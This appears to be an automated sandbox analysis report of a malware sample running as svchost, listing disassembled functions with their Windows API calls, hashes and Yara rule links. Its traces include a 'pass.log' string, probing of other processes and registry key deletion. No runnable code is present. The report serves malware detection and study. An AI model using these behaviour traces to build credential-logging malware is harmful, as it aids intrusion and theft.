                                                                                                                                                                                                              • API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 699575883-0
                                                                                                                                                                                                              • Opcode ID: ab7a0f589076dc316c23de7aeedba5893b3578b57dd7db2b0a28f330af1bf6d6
                                                                                                                                                                                                              • Instruction ID: abb5b88e6d6dbb2edac63dce6cc5142a9caf6c383d4f752e633baeecac52de28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab7a0f589076dc316c23de7aeedba5893b3578b57dd7db2b0a28f330af1bf6d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40017C74A85200BBD7148B20EC5DB9D37A0EB49319F825AA4F5169A280CBB154D18F91
                                                                                                                                                                                                              Function 0264CBF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowRect.USER32(0264CD24,00000000), ref: 0264CBFF
                                                                                                                                                                                                              • GetWindowLongA.USER32(0264CD24,000000F0), ref: 0264CC19
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(0264CD24,000000FA,?), ref: 0264CC34
                                                                                                                                                                                                              • GetScrollBarInfo.USER32(0264CD24,000000FB,0000003C), ref: 0264CC61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InfoScrollWindow$LongRect
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 4167475372-4251816714
                                                                                                                                                                                                              • Opcode ID: 6d45fab383197e8da4b7a0628abc2bfcf65ef1aa32278dd75c30d97b73996606
                                                                                                                                                                                                              • Instruction ID: 3d435271f708307a348ad9e0666037667b35eaa31a1c3e3cc3e37e4f29c02cab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d45fab383197e8da4b7a0628abc2bfcf65ef1aa32278dd75c30d97b73996606
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1431C570902B05EFC724CF6AD584A5AFBF5BB48315B508A1EE49A93B61DB30F590CF90
                                                                                                                                                                                                              Function 0265B110 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A6EF), ref: 0265B137
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 0265B175
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0265B1B9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePath$AttributesBackslashExists
                                                                                                                                                                                                              • String ID: 8A99A6EF$pass.log
                                                                                                                                                                                                              • API String ID: 2713433229-3676434369
                                                                                                                                                                                                              • Opcode ID: b6c07e9bb19516e15fb79285758180b5ad66d7acc3928c0c0645656a116f42fe
                                                                                                                                                                                                              • Instruction ID: 3b951c36f48883192e476a9802d8bf1e1accad951cd1d67dc6de5beeff5c62a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6c07e9bb19516e15fb79285758180b5ad66d7acc3928c0c0645656a116f42fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7112B309446989BCB218B28AD686FBBBE4EB86304F144AD5EDCAC7304EE718494C7C0
                                                                                                                                                                                                              Function 026541E0 Relevance: 8.8, APIs: 7, Instructions: 55memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,02665097,00000000,76DC34D0,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 026541FE
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654205
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654215
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,76DC34D0,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654229
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654230
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,02664081,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 0265424A
                                                                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654251
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3638075499-0
                                                                                                                                                                                                              • Opcode ID: 6843b64a1c7606f52127a2b02bea0db966c02472176c03946a03c2a04d3b69fa
                                                                                                                                                                                                              • Instruction ID: 2ae7f937c839b8cd90786c7729e49c81b488810737c9973707528be3ced40d9c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6843b64a1c7606f52127a2b02bea0db966c02472176c03946a03c2a04d3b69fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B101FC77A4022177D71059A96C88F8B7A1CEFD0672F164321FE05C7380DE21845486F5
                                                                                                                                                                                                              Function 02657810 Relevance: 8.8, APIs: 7, Instructions: 50memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02664980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7750FFB0,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649AD
                                                                                                                                                                                                                • Part of subcall function 02664980: GetProcessTimes.KERNEL32(00000000,?,?,?,02657967,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649CA
                                                                                                                                                                                                                • Part of subcall function 02664980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649E2
                                                                                                                                                                                                                • Part of subcall function 02664980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,02657967,00000000), ref: 026649F3
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB80,000002F0,00000000,00000000,02F844C8,02657AD4), ref: 02657828
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80), ref: 02657844
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02F844C8), ref: 02657869
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265786C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,02F844C8), ref: 02657879
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265787C
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB80), ref: 02657887
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3901171168-0
                                                                                                                                                                                                              • Opcode ID: 4259cf8831e2e8157d837c9b51d645fef8c1782750e255811c1cff489c22f5d0
                                                                                                                                                                                                              • Instruction ID: a66a2ba6202b47369acb0be1557392c66c8b014ccac9b58666b64ff7c08f5359
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4259cf8831e2e8157d837c9b51d645fef8c1782750e255811c1cff489c22f5d0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0101FC32E81220BBD7216F959C48F6FBB58EFCCB72B624A29E94693200CB344850C7D0
                                                                                                                                                                                                              Function 00401420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                              Function 00401390 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D
                                                                                                                                                                                                              Function 02654120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0265412B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,02651163,00001000,?,?), ref: 0265413C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0265414C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: b9f0e12d6e194e6ddc70228ce78c527456bc2c46a56ce330dc103d96b6ffd54f
                                                                                                                                                                                                              • Instruction ID: a4787e8489e115819a5d4dfa21c1a407a65a6b831844be2ac1043aa33b2348c6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9f0e12d6e194e6ddc70228ce78c527456bc2c46a56ce330dc103d96b6ffd54f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5E09230BC03006BF7006FB1AC59E6E37A8BB467983409E21B456D1200DB6296A0CA52
                                                                                                                                                                                                              Function 026543D0 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026543D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265440C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02654438
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265445F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 026544DD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 56389573b8e94c6f5fc16070b732362f4982389ccd76bd74b248e3f533faee7b
                                                                                                                                                                                                              • Instruction ID: 30ba4719f73ace65c77b598df90cb96fe0cd43cefb8558d2138b0a492b94d16d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56389573b8e94c6f5fc16070b732362f4982389ccd76bd74b248e3f533faee7b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9412DB0D40218AFDB10DFA8D884AAEBBF5FB48304F54896AE855E7340D7749980CF91
                                                                                                                                                                                                              Function 0265AAA0 Relevance: 7.6, APIs: 6, Instructions: 106memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265AACC
                                                                                                                                                                                                              • strstr.MSVCRT ref: 0265AAF1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,02651A39), ref: 0265AB71
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,02651A39), ref: 0265AB78
                                                                                                                                                                                                              • memset.MSVCRT ref: 0265AB88
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,02651A39), ref: 0265AB9D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2033102291-0
                                                                                                                                                                                                              • Opcode ID: 1cb7a452f90ee672f1ad60148000a1849b1e61ea2a14888cb455bcf49dec14b1
                                                                                                                                                                                                              • Instruction ID: b72a5c538146f64cd68fc92cfd0ca05756acc81c9f5351f33d1d8371a8ee4b42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cb7a452f90ee672f1ad60148000a1849b1e61ea2a14888cb455bcf49dec14b1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9313B72D00A356BD7224EA8DC84BBA7B9B9F45258F198725EC46C7301EB32DD4182E0
                                                                                                                                                                                                              Function 026542A0 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026542A9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 026542DC
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02654308
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0265432F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 026543AD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: dc47dc950a68ba1246ec067da2d18397b9b5a79e81a0f7c7e406c99ec5c7c58b
                                                                                                                                                                                                              • Instruction ID: 79990b472af489e55278e5ae8b9ed32dc6eb5a47c3eadd01037b006d912da7a6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc47dc950a68ba1246ec067da2d18397b9b5a79e81a0f7c7e406c99ec5c7c58b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC410C70D40218EFDB10DFA9D884AAEBBF5EF48704F50896EE845E7310EB7499808F91
                                                                                                                                                                                                              Function 026413B0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 026413DE
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264141A
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02641446
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 0264146D
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02641498
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 5348636b5b6f9e723c2f7f898932222952593301b83a1a0fe7332786d0e0330f
                                                                                                                                                                                                              • Instruction ID: dfe86565f8005de6eefa291af875b16da61ee29437983285e091224442788be1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5348636b5b6f9e723c2f7f898932222952593301b83a1a0fe7332786d0e0330f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231C8B1D0020DAFDB40DFA9D885AEEBBF9FB4C314F50856AE919E7240E77499418F90
                                                                                                                                                                                                              Function 026651F0 Relevance: 7.6, APIs: 5, Instructions: 83registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,0265369B,00000000,00010108,?,00000000), ref: 0266522F
                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 02665264
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0266528E
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(00000104,0265369B), ref: 026652A6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 026652B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                                                              • Opcode ID: 2676cae93918c41d39ad707dea8a86d6d5792403cf024971e322feb2448baee3
                                                                                                                                                                                                              • Instruction ID: daf42f1f34363f0c78167759ebb97ffd6b02e5b0e62ce1a8184e56bceeb88ddd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2676cae93918c41d39ad707dea8a86d6d5792403cf024971e322feb2448baee3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD21A176A40219BBCB20DA98DC89FEEB7ACEB44710F544695FD41EB340D7B0AE448BD0
                                                                                                                                                                                                              Function 026418B0 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2377537114-0
                                                                                                                                                                                                              • Opcode ID: ca25257797860d1351d7602a1a59f2e5da378f4ee5b57cb84ebe1d8a43868d6c
                                                                                                                                                                                                              • Instruction ID: 334d98dc8d465fd9f683c924843a9c5981aaf3139b9b50e620ea5809e521fb5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca25257797860d1351d7602a1a59f2e5da378f4ee5b57cb84ebe1d8a43868d6c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A32197B0500209AFC714CF59D880B6ABBF5FF4A304F10996DE58EC3300EB71A5A0CB95
                                                                                                                                                                                                              Function 02645940 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02645962
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 02645995
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 026459C1
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02665460,?,0000001C), ref: 026459E8
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02645A04
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: c70aeafc12b1d9c2efbd802fe70192969bc10250d4601af6bc61eb654f5ebff3
                                                                                                                                                                                                              • Instruction ID: d936fbb6020d40de254d9595d27b557c758dfd51a7f020c9c3f5199e43b2439e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c70aeafc12b1d9c2efbd802fe70192969bc10250d4601af6bc61eb654f5ebff3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF31CAB1D4120DAFDB40CFA9D885AEEBBF5FB48300F50456AE905E7200E77099448F90
                                                                                                                                                                                                              Function 0265AA20 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
